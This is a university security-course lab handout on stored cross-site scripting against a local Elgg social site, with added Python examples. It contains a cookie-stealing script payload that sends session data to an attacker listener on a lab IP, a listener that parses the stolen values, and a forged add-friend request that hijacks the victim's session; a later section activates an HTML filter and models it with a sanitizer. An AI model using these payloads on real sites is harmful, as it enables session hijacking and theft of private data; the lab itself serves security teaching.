Title: Lab14 Cross Site Scripting
Course: Practicum of Attacking and Defense of Network Security
Institution: National Taiwan University

Lab14: Cross Site Scripting (XSS) Attacks
Due 09:00am, 01/02/2019

1. Learning Goals
• Learn the Cross Site Scripting (XSS) attack and emulate an attacking scenario
• Learn to use an open source tool (JavaScript and C) to capture cookies and secret information
• Develop a software tool (in Java) to emulate (replay) cookies for the XSS attack
• Implement a countermeasure for the XSS attack

2. Lab Environments
This lab uses a single host running two virtual machines. One VM hosts a web server (Apache) with an emulated social media web site (www.xsslabelgg.com). The hacker, Samy, uses JavaScript to capture cookie and session information when the victim (Alice) visits his profile on the social web site, and sends this information to his attacking machine (VM2). The attacker then uses the cookie and session information to hijack Alice's web session and add himself (Samy) as her friend. Once the hacker (Samy) is a friend of the victim (Alice), he can access the victim's private information, which is visible only to friends.

3. Lab Preparation

3.1 Task 3.1: JavaScript and Cookie
This task is to learn the basics of JavaScript.
Step 1: Create an HTML file in /var/www/JavaScript. Then verify the web page.

3.2 Task 3.2: Software Download (echoserv)
Step 1: Download the echoserv package to VM2 (the attacking machine):
wget www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg/files/echoserv.tar
Step 2: After the download, unpack the package.
Step 3: Compile the source code to get the executable echoserv, which will be used in Task 4.2.

3.3 Task 3.3: Develop a Java Program for the XSS Attack
The Java program is provided in Section 3.4 of the SEED lab handout:
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg/Web_XSS_Elgg.pdf
The template in the handout requires four parameters to be hard-coded in the program: elgg_ts, elgg_token, guid, and cookie. How to fill in these four parameters is discussed in Task 4.3.
The Java program is called HTTPSimpleForge, and the file name of the Java program is HTTPSimpleForge.java. The handout's screenshot shows how to compile and execute the Java program.

Lab14: XSS Attack, 12/26/2018 (page 1 of 9)

3.4 Task 3.4: Verify the ELGG Web Site
The Apache server and the ELGG web site should already be in the SEED VirtualBox image.
Step 1: Verify that the Apache server is up and running.
Step 2: Verify www.XSSLabElgg.com in the /etc/hosts file on VM1 and VM2.
Step 3: Verify the document root of www.XSSLabElgg.com in /etc/apache2/sites-available/default.
Step 4: Verify the ELGG web site from both VM1 and VM2.

4. Procedure for Cross Site Scripting (XSS) Attack

4.1 Task 4.1: Posting a Message
This task is to put JavaScript into the profile information form. VM1 is used to set the JavaScript that posts a message, and VM2 is used to test the setting.
Step 1: On VM1, visit the ELGG site and login as Samy (user name: samy, password: seedsamy).
Step 2: On VM1, go to Samy's profile and then choose edit profile.
Step 3: On VM2, login as Alice (user: alice, password: seedalice). Then go to Members and select Samy. When visiting Samy's profile, the JavaScript will be executed and shows an alert message, as in Screenshot-01.
Screenshot-01: Posting a message when visiting a user profile

4.2 Task 4.2: Stealing the Cookie Information
The purpose of Task 4.2 is to steal the information needed for Task 4.3. The procedure is to capture the cookie and session information on VM1 and send it to VM2 (192.168.56.102) on TCP port 5555 (hard-coded in echoserv).
Step 1: On VM2, start echoserv to capture the cookie information.
Step 2: On VM1, still logged in as Samy, edit the profile with the JavaScript shown in the handout's screenshot. Note that the screenshot does not capture all the script information. Save the data and observe the session information captured on VM2.
Screenshot-02: Capturing the cookie and GID of Samy. Note that the gid of Samy is 42.
Step 3: Edit Samy's profile again (Brief description) with the JavaScript shown in the handout (note: use the gid of Samy to add Samy as a friend of Alice). Save the change and observe the session information captured in echoserv on VM2.
Step 4: On VM1, change the login from Samy to Alice and verify that Alice has no friends.
Step 5: Alice browses the member list and checks Samy's profile. When Alice visits Samy's profile, her session information is captured in echoserv on VM2.
Screenshot-03: Capturing the session information of Alice
Note that this session information will be used in the next task to hijack the session.

Session information captured in this task (values from the handout's run):
Elgg (cookie): t3r4oc6l1svkb9lgbllrrfr447
elgg_token: dc0fcf8d0391fd9c06245094ea0f3451
elgg_ts: 1545202285
gid: 39 (Alice), 42 (Samy)

4.3 Task 4.3: Hijack the Session and Launch the XSS Attack
This task is to use the session information to hijack Alice's session and use it to add Samy as Alice's friend. This attacking scenario is like visiting someone's page on a social web site (e.g., Facebook): the owner of that page could hijack your session information and add you as his/her friend. Once the hacker is your friend, he/she can access your private information, which is available only to friends.
Step 1: Modify the Java program (Task 3.3) with the session information of Alice.
Step 2: On VM1, start Wireshark to capture HTTP traffic (tcp port 80).
Step 3: Compile and run the Java program.
Step 4: Capture the HTTP traffic from HTTPSimpleForge (the forged HTTP packets). It must include HTTP 200 OK.
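The following Python program is an added example for Task 4.2 and Task 4.3; it is not part of this handout, nor of the SEED echoserv or HTTPSimpleForge code. It models offline what echoserv receives when the injected script runs in Alice's browser, and what HTTPSimpleForge then sends with that information. Assumptions not stated on this page: the injected script reports the cookie, timestamp, token and guid as query parameters named c, ts, token and guid; the add-friend action is a POST to /action/friends/add with the fields friend, __elgg_ts and __elgg_token (Elgg's action interface as used by the SEED handout); the captured request text and its headers are constructed for the example, using the values from the table above.

```python
# Added example (not the handout's or SEED's code): offline model of what
# echoserv captures in Task 4.2 and what HTTPSimpleForge forges in Task 4.3.
# Assumed: exfil query keys c/ts/token/guid; action URL /action/friends/add
# with fields friend, __elgg_ts, __elgg_token.
import socket
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample of the request Alice's browser would send to echoserv on
# VM2 when the injected script runs on Samy's profile.  Values are the ones
# from the handout's table; the headers are made up for the example.
CAPTURED = (
    "GET /?c=Elgg%3Dt3r4oc6l1svkb9lgbllrrfr447&ts=1545202285"
    "&token=dc0fcf8d0391fd9c06245094ea0f3451&guid=39 HTTP/1.1\r\n"
    "Host: 192.168.56.102:5555\r\n"
    "Referer: http://www.xsslabelgg.com/profile/samy\r\n"
    "\r\n"
)


def listen_once(port=5555, host="0.0.0.0"):
    """Minimal stand-in for echoserv: accept one connection, return the raw request."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(65535)
            # Answer so the victim's browser does not hang on the request.
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
    return data.decode("latin-1")


def parse_capture(raw):
    """Pull the four HTTPSimpleForge parameters out of a captured request.

    Returns None when the request line carries no Elgg session cookie
    (e.g. a stray /favicon.ico fetch hitting the listener).
    """
    request_line = raw.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    if len(parts) != 3:
        return None
    query = parse_qs(urlsplit(parts[1]).query)       # percent-decodes values
    cookie_header = query.get("c", [""])[0]            # e.g. "Elgg=t3r4...; other=x"
    cookies = dict(item.split("=", 1) for item in cookie_header.split("; ") if "=" in item)
    if "Elgg" not in cookies:
        return None
    return {
        "cookie": cookies["Elgg"],
        "elgg_ts": query.get("ts", [""])[0],
        "elgg_token": query.get("token", [""])[0],
        "guid": query.get("guid", [""])[0],
    }


def forge_add_friend(session, elgg_ts, elgg_token, friend_guid, host="www.xsslabelgg.com"):
    """Build the raw HTTP request that adds friend_guid inside the hijacked session.

    session, elgg_ts and elgg_token must all be the victim's (Alice's): Elgg
    derives the token from the timestamp and the session, so Samy's own token
    would be rejected when sent with Alice's cookie.
    """
    body = urlencode({"friend": friend_guid, "__elgg_ts": elgg_ts, "__elgg_token": elgg_token})
    return (
        "POST /action/friends/add HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: Elgg={session}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
        f"{body}"
    ).encode("ascii")


def status_code(response):
    """HTTP status of a raw response (0 when the status line is unparsable)."""
    fields = response.split(b"\r\n", 1)[0].split(b" ")
    return int(fields[1]) if len(fields) >= 2 and fields[1].isdigit() else 0


def send_forged(request, host="www.xsslabelgg.com", port=80):
    """Deliver the forged request from a VM with the lab's /etc/hosts entry."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    alice = parse_capture(CAPTURED)
    forged = forge_add_friend(alice["cookie"], alice["elgg_ts"], alice["elgg_token"], friend_guid=42)
    print(forged.decode())
```

Two practical points for Task 4.3 follow from the code. The guid in the captured request is Alice's own (39); the forge must name Samy (42) as the friend while everything else (cookie, timestamp, token) stays Alice's, because the token is bound to her session and also expires after a configurable timeout, which is one reason the handout allows the final step to fail. Elgg actions normally answer with a redirect, so a raw socket client such as send_forged sees a 3xx first; the HTTP 200 OK the handout wants in Wireshark is the response to the page that HttpURLConnection fetches after following that redirect.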


Screenshot-04: Execution of the Java program. Must show: 1. timestamp, 2. token, 3. cookie, 4. HTTP 200 OK.
Step 5: Verify that Samy is a friend of Alice.
Screenshot-05: Verify that Samy is a friend of Alice.
Note: if the attack fails, you may try a new SEED image from scratch. If it still fails, you may simply report the problem and your observation. It is acceptable if the final step of the attack fails. The XSS attack is about stealing the information, from which hackers may try various attacking scenarios.

4.4 Task 4.4: Countermeasure of XSS Attack
Step 1: On the ELGG web site, login as administrator (user: admin, password: seedelgg).
Step 2: Go to the Administration tab.
Step 3: Select the plugins.
Step 4: In the drop-down list of the filter, select Security and Spam.
Step 5: Activate HTMLawed 1.8.
Screenshot-06: Activate HTMLawed to protect against the XSS attack
Step 6: On the ELGG web site, login as Alice and then delete Samy as her friend.
Step 7: Follow the steps in Task 4.2 and Task 4.3, then run the Java program and check whether Samy is Alice's friend.
Step 8: On the ELGG web site, login as Samy. Go to his profile and take a screenshot of his brief description. Save, then exit.
Screenshot-07a: Brief description before checking.
Step 9: Go back to Samy's profile and check his brief description.
Screenshot-07b: Brief description after checking.
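The following Python program is an added example for Task 4.4; it is not part of this handout and is not the HTMLawed plugin's code. It stands in for an input-time HTML filter with a small allow-list and replays the order of Steps 5 to 9 on a profile field, which is enough to see what activating such a filter does and does not change. The assumption that the filter runs only when a field is saved, the ProfileStore model, and the sample payload are all constructed for the example.

```python
# Added example (not the handout's or HTMLawed's code): an allow-list HTML
# filter that, like an input filter in Elgg, runs only when a field is saved
# (assumption for this model), plus a replay of Task 4.4 Steps 5-9.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_CONTENT = {"script", "style"}   # element bodies that must not survive


class AllowListFilter(HTMLParser):
    """Re-emit only allow-listed tags/attributes; other tags are dropped, text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0          # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                   # e.g. <img onerror=...>: tag dropped, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue             # strips onmouseover=, onclick=, style=, ...
            if name == "href" and not (value or "").lower().startswith(("http://", "https://")):
                continue             # blocks javascript: and data: links
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize(html):
    """Filter one HTML fragment through the allow-list."""
    f = AllowListFilter()
    f.feed(html)
    f.close()
    return "".join(f.out)


class ProfileStore:
    """Profile 'Brief description' storage with an input-time filter toggle."""

    def __init__(self, filter_on_save=False):
        self.filter_on_save = filter_on_save
        self._fields = {}

    def save(self, user, description):
        # Filtering happens here, on input, and nowhere else (model assumption).
        if self.filter_on_save:
            description = sanitize(description)
        self._fields[user] = description

    def get(self, user):
        return self._fields.get(user, "")

    def render(self, user):
        """What a visitor's browser receives for the field: the stored value as-is."""
        return self.get(user)


# Constructed payload of the shape Task 4.2 uses (the handout's own script is
# only in a screenshot): report document.cookie to echoserv on VM2.
PAYLOAD = ('Hello!<script>new Image().src="http://192.168.56.102:5555/?c="'
           '+escape(document.cookie);</script>')


def lab_timeline():
    """Replay Task 4.4: is the script still served after each step?"""
    store = ProfileStore(filter_on_save=False)
    store.save("samy", PAYLOAD)                             # Task 4.2: stored XSS planted
    planted = "<script>" in store.render("samy")
    store.filter_on_save = True                             # Step 5: activate the filter
    after_activation = "<script>" in store.render("samy")   # Step 7: still served
    store.save("samy", store.get("samy"))                   # Step 8: open profile, save
    after_resave = "<script>" in store.render("samy")       # Step 9: check again
    return planted, after_activation, after_resave


if __name__ == "__main__":
    print(lab_timeline())                                   # (True, True, False)
```

In this model the filter strips the script, event-handler attributes and javascript: links from anything submitted after it is activated, but it never touches text that is already in the database: a description stored before activation is still served with the script at Step 7 and only loses it when the profile is saved again at Step 8, which is what Screenshot-07a and Screenshot-07b compare. An input filter also never sees the request HTTPSimpleForge sends, since that request carries no HTML; it replays session information that was captured earlier.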

5. Lab Report
1. Your name, ID:
2. Lab Log
   Lab Session | Date | Lab Duration (e.g., 1:30) | Comments (problems/accomplishment)
   1 | | |
   2 | | |
3. Proof of your lab work
   a. Screenshot-1: Posting a JavaScript message when visiting a social media site
   b. Screenshot-2: Capturing the user.gid information of Samy
   c. Screenshot-3: Capturing Alice's session information. Record the session information: Elgg, elgg_token, elgg_ts, gid (Alice), gid (Samy)
   d. Screenshot-4: Wireshark capture of the HTTP packets from HTTPSimpleForge, which show the session information of Alice
   e. Screenshot-5: Verification that Samy is a friend of Alice. Is the attack successful or not?
   f. Screenshot-6: Activation of HTMLawed 1.8. Is the attack successful or not after HTMLawed is activated?
   g. Screenshot-7: two screenshots showing the Brief Description of Samy before and after checking.
4. Question: After HTMLawed is activated, we can still launch a successful XSS attack (Step 7 of Task 4.4). Why?
5. Lab reflection: Describe whether the lab learning goals are met, and any interesting observation from this lab exercise.

